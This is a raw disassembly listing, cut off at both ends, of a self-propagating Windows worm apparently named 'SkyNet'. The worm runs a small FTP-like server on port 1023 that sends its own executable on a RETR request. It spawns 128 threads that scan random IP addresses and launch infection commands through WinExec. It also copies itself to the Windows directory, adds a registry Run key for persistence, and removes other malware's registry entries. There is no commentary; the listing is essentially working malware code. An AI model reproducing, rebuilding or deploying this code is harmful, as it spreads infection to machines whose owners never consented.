pop ecx
mov [ebp+var_14], eax
jmp short loc_401C9F
; ---------------------------------------------------------------------------
loc_401C9C: ; CODE XREF: sub_401B59+111�j
push 6
pop edi
loc_401C9F: ; CODE XREF: sub_401B59+135�j
; sub_401B59+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402770
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C68
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call dword_4050F0 ; wsprintfA
add esp, 18h
push 0
push off_4068E0
call sub_402300
pop ecx
push eax
push off_4068E0
jmp loc_401E32
; ---------------------------------------------------------------------------
loc_401CF5: ; CODE XREF: sub_401B59+D5�j
lea eax, [ebp+var_4E4]
push offset aRetr ; "RETR"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz loc_401E37
push 0
push off_4068E4
call sub_402300
pop ecx
push eax
push off_4068E4
push ebx
call esi ; dword_405118
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401E14
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_4022A0
add esp, 0Ch
mov [ebp+var_28], 2
push edi
call dword_40511C
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call dword_405120
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401E14
lea eax, [ebp+var_28]
push 10h
push eax
push ebx
call dword_405124
cmp eax, 0FFFFFFFFh
jnz short loc_401D95
push ebx
call dword_405128
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401D95: ; CODE XREF: sub_401B59+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call dword_405038 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call dword_405034 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401E14
lea eax, [ebp+var_2]
push offset dword_4070C8
push eax
call sub_402810
mov ebx, dword_405030
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401DDF: ; CODE XREF: sub_401B59+2A6�j
call ebx ; dword_405030
cmp eax, 1
jnz short loc_401E01
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; dword_405118
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401DDF
; ---------------------------------------------------------------------------
loc_401E01: ; CODE XREF: sub_401B59+28B�j
push [ebp+var_8]
call dword_40501C ; _lclose
lea eax, [ebp+var_60]
push eax
call sub_401210
pop ecx
loc_401E14: ; CODE XREF: sub_401B59+1DD�j
; sub_401B59+21B�j ...
push [ebp+var_C]
call dword_405128
push 0
push off_4068DC
call sub_402300
pop ecx
push eax
push off_4068DC
loc_401E32: ; CODE XREF: sub_401B59+197�j
push [ebp+arg_0]
jmp short loc_401E6D
; ---------------------------------------------------------------------------
loc_401E37: ; CODE XREF: sub_401B59+1B1�j
lea eax, [ebp+var_4E4]
push offset aQuit ; "QUIT"
push eax
call sub_4026F0
pop ecx
test eax, eax
pop ecx
jz short loc_401E57
push ebx
call dword_405128
jmp short loc_401E6F
; ---------------------------------------------------------------------------
loc_401E57: ; CODE XREF: sub_401B59+2F3�j
push 0
push off_4068DC
call sub_402300
pop ecx
push eax
push off_4068DC
loc_401E6C: ; CODE XREF: sub_401B59+8A�j
; sub_401B59+BB�j
push ebx
loc_401E6D: ; CODE XREF: sub_401B59+2DC�j
call esi ; dword_405118
loc_401E6F: ; CODE XREF: sub_401B59+2FC�j
cmp [ebp+var_10], 0
jg loc_401B94
push [ebp+arg_0]
call dword_405128
pop edi
pop esi
loc_401E84: ; CODE XREF: sub_401B59+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B59 endp
; =============== S U B R O U T I N E =======================================
sub_401E8B proc near ; CODE XREF: sub_401B59+119�p
; sub_401B59+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E93: ; CODE XREF: sub_401E8B+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E9D
cmp al, 9
jnz short loc_401EA0
loc_401E9D: ; CODE XREF: sub_401E8B+C�j
inc esi
jmp short loc_401E93
; ---------------------------------------------------------------------------
loc_401EA0: ; CODE XREF: sub_401E8B+10�j
; sub_401E8B+2E�j
movsx eax, byte ptr [esi]
push eax
call sub_402900
test eax, eax
pop ecx
jz short loc_401EBB
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401EA0
; ---------------------------------------------------------------------------
loc_401EBB: ; CODE XREF: sub_401E8B+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EC0 proc near ; DATA XREF: sub_4020D9+6E�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_405120
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401EE4
loc_401EDC: ; CODE XREF: sub_401EC0+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401EE4: ; CODE XREF: sub_401EC0+1A�j
push 3FFh
mov [ebp+var_14], 2
call dword_40511C
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call dword_405108
cmp eax, 0FFFFFFFFh
jz short loc_401F1C
push 5
push edi
call dword_40510C
cmp eax, 0FFFFFFFFh
jnz short loc_401F25
loc_401F1C: ; CODE XREF: sub_401EC0+4C�j
push edi
call dword_405128
jmp short loc_401EDC
; ---------------------------------------------------------------------------
loc_401F25: ; CODE XREF: sub_401EC0+5A�j
; sub_401EC0+89�j
push esi
push esi
push edi
call dword_405110
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B59
push esi
push esi
call dword_40503C ; CreateThread
push 19h
call dword_40502C ; Sleep
jmp short loc_401F25
sub_401EC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401F4B proc near ; DATA XREF: sub_4020D9+82�o
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
var_454 = byte ptr -454h
var_450 = byte ptr -450h
var_438 = byte ptr -438h
var_400 = byte ptr -400h
sub esp, 45Ch
push ebx
push ebp
push esi
push edi
push 0FFFFFFFFh
call dword_405048 ; GetCurrentThread
push eax
call dword_405044 ; SetThreadPriority
loc_401F64: ; CODE XREF: sub_401F4B+37�j
xor esi, esi
lea eax, [esp+46Ch+var_458]
push esi
push eax
mov [esp+474h+var_458], esi
call dword_4050FC
cmp eax, esi
jnz short loc_401F84
push 19h
call dword_40502C ; Sleep
jmp short loc_401F64
; ---------------------------------------------------------------------------
loc_401F84: ; CODE XREF: sub_401F4B+2D�j
lea eax, [esp+46Ch+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+46Ch+var_438]
push eax
call dword_405134
movsx ebp, al
movsx eax, ah
mov [esp+46Ch+var_45C], eax
cmp ebp, esi
mov eax, 100h
jge short loc_401FAF
add ebp, eax
loc_401FAF: ; CODE XREF: sub_401F4B+60�j
cmp [esp+46Ch+var_45C], esi
jge short loc_401FB9
add [esp+46Ch+var_45C], eax
loc_401FB9: ; CODE XREF: sub_401F4B+68�j
mov edi, dword_4050F0
mov esi, 0FFh
mov ebx, offset aI_I_I_I ; "%i.%i.%i.%i"
loc_401FC9: ; CODE XREF: sub_401F4B+189�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_402029
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_40200C
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_402026
; ---------------------------------------------------------------------------
loc_40200C: ; CODE XREF: sub_401F4B+9C�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push [esp+474h+var_45C]
loc_402026: ; CODE XREF: sub_401F4B+BF�j
push ebp
jmp short loc_402055
; ---------------------------------------------------------------------------
loc_402029: ; CODE XREF: sub_401F4B+8C�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_402055: ; CODE XREF: sub_401F4B+DC�j
lea eax, [esp+47Ch+var_454]
push ebx
push eax
call edi ; dword_4050F0
add esp, 18h
lea eax, [esp+468h+var_450]
push 3E8h
push eax
call dword_405134
push eax
call sub_401B1B
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4020CC
lea eax, [esp+46Ch+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_4020CC
lea eax, [esp+46Ch+var_400]
push 400h
push eax
push 0
call dword_405038 ; GetModuleFileNameA
lea eax, [esp+46Ch+var_400]
push offset asc_406A84 ; " "
push eax
call sub_402820
lea eax, [esp+474h+var_454]
push eax
lea eax, [esp+478h+var_400]
push eax
call sub_402820
add esp, 10h
lea eax, [esp+46Ch+var_400]
push 0
push eax
call dword_405040 ; WinExec
loc_4020CC: ; CODE XREF: sub_401F4B+130�j
; sub_401F4B+13F�j
push 19h
call dword_40502C ; Sleep
jmp loc_401FC9
sub_401F4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020D9 proc near ; CODE XREF: .text:004029F7�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
call dword_405054 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+arg_8]
call sub_402300
pop ecx
test eax, eax
pop ecx
jbe short loc_40210D
push [ebp+arg_8]
call sub_401A69
pop ecx
push 1
pop eax
locret_402109: ; CODE XREF: sub_4020D9+5F�j
leave
retn 10h
; ---------------------------------------------------------------------------
loc_40210D: ; CODE XREF: sub_4020D9+22�j
push esi
push edi
push 1
call sub_40219B
xor esi, esi
mov [esp+14h+var_14], offset aSkynetnotice ; "SkynetNotice"
push esi
push esi
call dword_405050 ; CreateMutexA
call dword_40504C ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_40213A
pop edi
xor eax, eax
pop esi
jmp short locret_402109
; ---------------------------------------------------------------------------
loc_40213A: ; CODE XREF: sub_4020D9+59�j
mov edi, dword_40503C
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401EC0
push esi
push esi
call edi ; dword_40503C
mov ebx, 80h
loc_402155: ; CODE XREF: sub_4020D9+8C�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401F4B
push esi
push esi
call edi ; dword_40503C
dec ebx
jnz short loc_402155
xor edi, edi
pop ebx
loc_40216A: ; CODE XREF: sub_4020D9+AA�j
; sub_4020D9+C0�j
push esi
call dword_405008
push 3E8h
call dword_40502C ; Sleep
inc edi
cmp edi, 1C20h
jle short loc_40216A
push esi
push offset aSkynet ; "SkyNet"
push offset a1_YourComputer ; "1. Your computer is affected by the MS0"...
push esi
xor edi, edi
call dword_4050F4 ; MessageBoxA
jmp short loc_40216A
sub_4020D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40219B proc near ; CODE XREF: sub_4020D9+38�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
var_424 = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
push edi
lea eax, [ebp+var_824]
push esi
push eax
push 0
call dword_405038 ; GetModuleFileNameA
lea eax, [ebp+var_424]
push esi
push eax
call dword_40505C ; GetWindowsDirectoryA
lea eax, [ebp+var_424]
push eax
call sub_402300
cmp [ebp+eax+var_425], 5Ch
pop ecx
jz short loc_4021F3
lea eax, [ebp+var_424]
push offset asc_406C50 ; "\\"
push eax
call sub_402820
pop ecx
pop ecx
loc_4021F3: ; CODE XREF: sub_40219B+43�j
push off_4068C8
lea eax, [ebp+var_424]
push eax
call sub_402820
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_402223
lea eax, [ebp+var_424]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call dword_405058 ; CopyFileA
loc_402223: ; CODE XREF: sub_40219B+70�j
lea eax, [ebp+var_4]
mov esi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push eax
push esi
push 80000002h
call dword_40500C
lea eax, [ebp+var_424]
push eax
call sub_402300
pop ecx
push eax
lea eax, [ebp+var_424]
push eax
push 1
push 0
push off_4068C8
push [ebp+var_4]
call dword_405004
push [ebp+var_4]
call dword_405000
push offset aSsgrate_exe ; "ssgrate.exe"
mov edi, 80000001h
push esi
push edi
call sub_401AED
push offset aDrvsys_exe ; "drvsys.exe"
push esi
push edi
call sub_401AED
push offset aDrvddll_exe ; "Drvddll_exe"
push esi
push edi
call sub_401AED
add esp, 24h
pop edi
pop esi
leave
retn
sub_40219B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022A0 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4022F3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4022E7
neg ecx
and ecx, 3
jz short loc_4022C9
sub edx, ecx
loc_4022C3: ; CODE XREF: sub_4022A0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4022C3
loc_4022C9: ; CODE XREF: sub_4022A0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4022E7
rep stosd
test edx, edx
jz short loc_4022ED
loc_4022E7: ; CODE XREF: sub_4022A0+18�j
; sub_4022A0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4022E7
loc_4022ED: ; CODE XREF: sub_4022A0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4022F3: ; CODE XREF: sub_4022A0+A�j
mov eax, [esp+arg_0]
locret_4022F7: ; DATA XREF: sub_422F4E�w
; sub_422F4E+29�r
retn
sub_4022A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402300 proc near ; CODE XREF: sub_401210+2C�p
; sub_401210+46�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_402320
loc_40230C: ; CODE XREF: sub_402300+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402353
test ecx, 3
jnz short loc_40230C
add eax, 0
loc_402320: ; CODE XREF: sub_402300+A�j
; sub_402300+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402320
mov eax, [ecx-4]
test al, al
jz short loc_402371
test ah, ah
jz short loc_402367
test eax, 0FF0000h
jz short loc_40235D
test eax, 0FF000000h
jz short loc_402353
jmp short loc_402320
; ---------------------------------------------------------------------------
loc_402353: ; CODE XREF: sub_402300+11�j
; sub_402300+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40235D: ; CODE XREF: sub_402300+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402367: ; CODE XREF: sub_402300+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402371: ; CODE XREF: sub_402300+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_402300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402380 proc near ; CODE XREF: sub_40137D+59�p
; sub_40137D+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4023A0
cmp edi, eax
jb loc_402518
loc_4023A0: ; CODE XREF: sub_402380+16�j
test edi, 3
jnz short loc_4023BC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp off_4024C8[edx*4]
; ---------------------------------------------------------------------------
loc_4023BC: ; CODE XREF: sub_402380+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4023D4
and eax, 3
add ecx, eax
jmp dword ptr loc_4023DC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4023D4: ; CODE XREF: sub_402380+46�j
jmp dword ptr loc_4024D8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4023DC: ; CODE XREF: sub_402380+31�j
; sub_402380+8E�j ...
jmp off_40245C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4023F0
dd offset loc_40241C
dd offset loc_402440
; ---------------------------------------------------------------------------
loc_4023F0: ; DATA XREF: sub_402380+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40241C: ; DATA XREF: sub_402380+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402440: ; DATA XREF: sub_402380+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4023DC
rep movsd
jmp off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40245C dd offset loc_4024BF ; DATA XREF: sub_402380:loc_4023DC�r
dd offset loc_4024AC
dd offset loc_4024A4
dd offset loc_40249C
dd offset loc_402494
dd offset loc_40248C
dd offset loc_402484
dd offset loc_40247C
; ---------------------------------------------------------------------------
loc_40247C: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402484: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40248C: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_402494: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_40249C: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4024A4: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4024AC: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4024BF: ; CODE XREF: sub_402380:loc_4023DC�j
; DATA XREF: sub_402380:off_40245C�o
jmp off_4024C8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4024C8 dd offset loc_4024D8 ; DATA XREF: sub_402380+35�r
; sub_402380+92�r ...
dd offset loc_4024E0
dd offset loc_4024EC
dd offset loc_402500
; ---------------------------------------------------------------------------
loc_4024D8: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4024E0: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4024EC: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402500: ; CODE XREF: sub_402380+35�j
; sub_402380+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402518: ; CODE XREF: sub_402380+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40254C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_402540
std
rep movsd
cld
jmp off_402660[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402540: ; CODE XREF: sub_402380+1B1�j
; sub_402380+208�j ...
neg ecx
jmp off_402610[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40254C: ; CODE XREF: sub_402380+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402564
and eax, 3
sub ecx, eax
jmp dword ptr loc_402564+4[eax*4]
; ---------------------------------------------------------------------------
loc_402564: ; CODE XREF: sub_402380+1D6�j
; DATA XREF: sub_402380+1DD�r
jmp off_402660[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402577+1
; ---------------------------------------------------------------------------
cwde
and eax, 25C00040h
inc eax
loc_402577: ; DATA XREF: sub_402380+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_402540
std
rep movsd
cld
jmp off_402660[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_402540
std
rep movsd
cld
jmp off_402660[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_402540
std
rep movsd
cld
jmp off_402660[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402614
dd offset loc_40261C
dd offset loc_402624
dd offset loc_40262C
dd offset loc_402634
dd offset loc_40263C
dd offset loc_402644
off_402610 dd offset loc_402657 ; DATA XREF: sub_402380+1C2�r
; ---------------------------------------------------------------------------
loc_402614: ; DATA XREF: sub_402380+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40261C: ; DATA XREF: sub_402380+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_402624: ; DATA XREF: sub_402380+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40262C: ; DATA XREF: sub_402380+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_402634: ; DATA XREF: sub_402380+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40263C: ; DATA XREF: sub_402380+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_402644: ; DATA XREF: sub_402380+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402657: ; CODE XREF: sub_402380+1C2�j
; DATA XREF: sub_402380:off_402610�o
jmp off_402660[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402660 dd offset loc_402670 ; DATA XREF: sub_402380+1B7�r
; sub_402380:loc_402564�r ...
dd offset loc_402678
dd offset loc_402688
dd offset loc_40269C
; ---------------------------------------------------------------------------
loc_402670: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402678: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402688: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40269C: ; CODE XREF: sub_402380+1B7�j
; sub_402380:loc_402564�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402380 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026C0 proc near ; CODE XREF: sub_401583+8�p
; sub_40380C+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4026E0
loc_4026CC: ; CODE XREF: sub_4026C0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4026CC
loc_4026E0: ; CODE XREF: sub_4026C0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4026C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026F0 proc near ; CODE XREF: sub_401A69+2D�p
; sub_401A69+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40276A
mov dh, [ecx+1]
test dh, dh
jz short loc_402757
loc_402708: ; CODE XREF: sub_4026F0+52�j
; sub_4026F0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_40272A
test al, al
jz short loc_402724
loc_402719: ; CODE XREF: sub_4026F0+32�j
mov al, [esi]
inc esi
loc_40271C: ; CODE XREF: sub_4026F0+3F�j
cmp al, dl
jz short loc_40272A
test al, al
jnz short loc_402719
loc_402724: ; CODE XREF: sub_4026F0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40272A: ; CODE XREF: sub_4026F0+23�j
; sub_4026F0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_40271C
lea edi, [esi-1]
loc_402734: ; CODE XREF: sub_4026F0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402763
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_402708
mov al, [ecx+3]
test al, al
jz short loc_402763
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_402734
jmp short loc_402708
; ---------------------------------------------------------------------------
loc_402757: ; CODE XREF: sub_4026F0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402A86
; ---------------------------------------------------------------------------
loc_402763: ; CODE XREF: sub_4026F0+49�j
; sub_4026F0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40276A: ; CODE XREF: sub_4026F0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4026F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402770 proc near ; CODE XREF: sub_401B59+103�p
; sub_401B59+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402789: ; CODE XREF: sub_402770+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402789
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4027B1
mov edx, dword_4070CC
